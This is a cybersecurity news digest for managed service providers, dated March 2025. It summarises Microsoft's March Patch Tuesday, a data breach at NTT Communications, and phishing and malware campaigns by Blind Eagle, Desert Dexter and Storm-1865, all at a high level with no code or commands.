MSP cybersecurity news digest, March 18, 2025

Microsoft's March Patch Tuesday addressed 57 security vulnerabilities, including six actively exploited zero-day flaws. Among these, six were categorized as "critical" and all pertain to remote code execution vulnerabilities.

The breakdown of the vulnerabilities is as follows: 23 elevation of privilege, three security feature bypass, 23 remote code execution, four information disclosure, one denial of service and three spoofing vulnerabilities. Notably, these figures exclude Mariner flaws and 10 Microsoft Edge vulnerabilities that were resolved earlier in the month.

The six actively exploited zero-day vulnerabilities addressed include issues in the Windows Win32 Kernel Subsystem, NTFS, Fast FAT File System Driver and Microsoft Management Console, among others. Furthermore, a publicly disclosed zero-day vulnerability in Microsoft Access was also patched.

In early February 2025, Japanese telecom provider NTT Communications Corporation (NTT) discovered unauthorized access to its internal systems, resulting in a data breach affecting nearly 18,000 corporate customers.

The compromised 'Order Information Distribution System' contained sensitive information such as customer names, representative names, contract numbers, phone numbers, email addresses, physical addresses and service usage details. Upon detection, NTT promptly restricted access to the affected system and disconnected another compromised device to prevent further unauthorized access.

The company stated that individual consumer data was not affected and chose to inform impacted corporate clients through a public announcement rather than through personalized notifications. This incident underscores the persistent cybersecurity challenges faced by major telecommunications providers.

Blind Eagle, a sophisticated threat actor, has been targeting Colombian institutions since November 2024 by launching a series of high-impact campaigns. In one campaign, more than 1,600 victims were affected.

The first stage of their attack chain relies on social engineering, particularly spear-phishing emails, to gain access and deliver malicious payloads like Remcos RAT. In the second stage, Blind Eagle exploited a known Microsoft Windows vulnerability (CVE-2024-43451), highlighting the group’s quick adaptation to bypass security updates just days after a patch has been released. 

The third stage involved using the HeartCrypt tool to pack a variant of PureCrypter, which in turn was responsible for deploying Remcos RAT. This RAT protected malicious executables and distributed payloads via Bitbucket and GitHub, evolving beyond traditional file-sharing platforms like Google Drive.

Since September 2024, the Middle East and North Africa have been targeted by a campaign delivering a modified version of AsyncRAT malware.

Researchers link this campaign to the region’s geopolitical climate, noting that attackers distribute malware through social media and legitimate file-sharing platforms. The operation, attributed to the threat actor "Desert Dexter," has affected approximately 900 victims, mainly in Libya, Saudi Arabia, Egypt, Turkey, the UAE, Qatar and Tunisia.

Attackers use temporary Facebook accounts to post advertisements containing malicious links that lead users to a malware-laced RAR archive. This archive executes a PowerShell script that establishes persistence, gathers system data, exfiltrates it to a Telegram bot, and ultimately deploys AsyncRAT by injecting it into an executable. Although the origin of Desert Dexter remains unknown, Arabic-language comments in the code and links to a Telegram channel suggest possible ties to Libya.

Researchers have exposed an ongoing phishing campaign targeting the hospitality sector by impersonating Booking.com and using a social engineering technique called ClickFix to deliver credential-stealing malware.

The campaign, tracked as Storm-1865 and active since December 2024, aims to commit financial fraud and theft while targeting hospitality professionals across North America, Oceania, Europe and Asia. Attackers send deceptive emails claiming to be from Booking.com, often mentioning negative guest reviews and including links or PDF attachments that seem to direct recipients to the legitimate booking site. However, these links actually lead to counterfeit CAPTCHA verification pages designed to mimic Booking.com. They trick users into executing a command via a keyboard shortcut that opens a Windows Run window.

This command leverages the legitimate mshta.exe binary to drop a payload comprising various malware families such as XWorm, Lumma stealer, VenomRAT, AsyncRAT, Danabot and NetSupport RAT. Previous iterations of Storm-1865 have also targeted e-commerce buyers. Security experts note that the rapid adoption of the ClickFix technique marks an evolution in social engineering, as it exploits user trust to bypass automated defenses and is now even being embraced by nation-state groups.